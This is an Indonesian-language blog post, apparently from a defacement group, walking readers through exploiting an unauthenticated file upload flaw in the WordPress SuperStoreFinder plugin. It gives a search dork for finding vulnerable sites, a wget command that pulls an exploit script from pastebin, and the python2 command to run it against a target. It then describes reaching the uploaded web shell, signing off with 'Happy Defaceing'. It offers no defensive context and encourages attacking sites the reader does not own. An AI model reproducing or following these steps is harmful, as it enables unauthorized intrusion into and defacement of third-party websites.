Menu

WordPress SuperStoreFinder Plugins - Unauthenticated Arbitrary File Upload

WordPress SuperStoreFinder Plugins - Unauthenticated Arbitrary File Upload



Hallo kawan kawan ketemu lagi bersama saya.. oke pada pertemuan kali ini kita akan membahas poc yang sangat bumming yang terbilang baru ini :D yaitu CWE-434 oke bagaimana kelanjutan dan cara meng exploitasi website wordpress dengan memanfaatkan kerentanan ini?


Exploitasi

awal awal yang kalian harus lakukan yaitu mencari site yang sekiranya lemah menggunakan dork? apa dorknya mas?...

Dork : SuperStoreFinder

Sebelum mengeksekusi Site kita akan mendownload tools nya terlebih dauhlu saya akan membakian source code dibawah ini ... 


kalian install di termux atau terminal dengan command

wget https://pastebin.com/raw/pMuFWLLm -O exploit.py




Berhubungan ini tools menggunakan bahasa python maka kita akan memberikan format .py yang wajib digunakan disetipan file python

oke sekarang kita mulai exploitasi dengan menggunakan python2

python2 exploit.py https://target.com/




Disini kita hanya memasukan site target tanpa path , karna path sudah otomatis ter detect di dalam tools nya secara default , maka dari itu kalian hanya memasukan site targetnya saja ...

seperti yang terlihat di gambar di atas kalian pilih opsi nomor 1 karna yg kita targetkan yaitu bug superstorefinder-wp nya :) 

dan jika vuln / ter upload shel nya akan seperti ini ... contoh gambar dibawah


anddd!!! kalian akses shellnya :D


Oke Happy Defaceing :D sampai jumpa and next materiii :D

Thanks To S4ndal.py 

Check Via Video Youtube Dark Clown Security



Iklan Tengah Post

Ads middle content1

Ads middle content2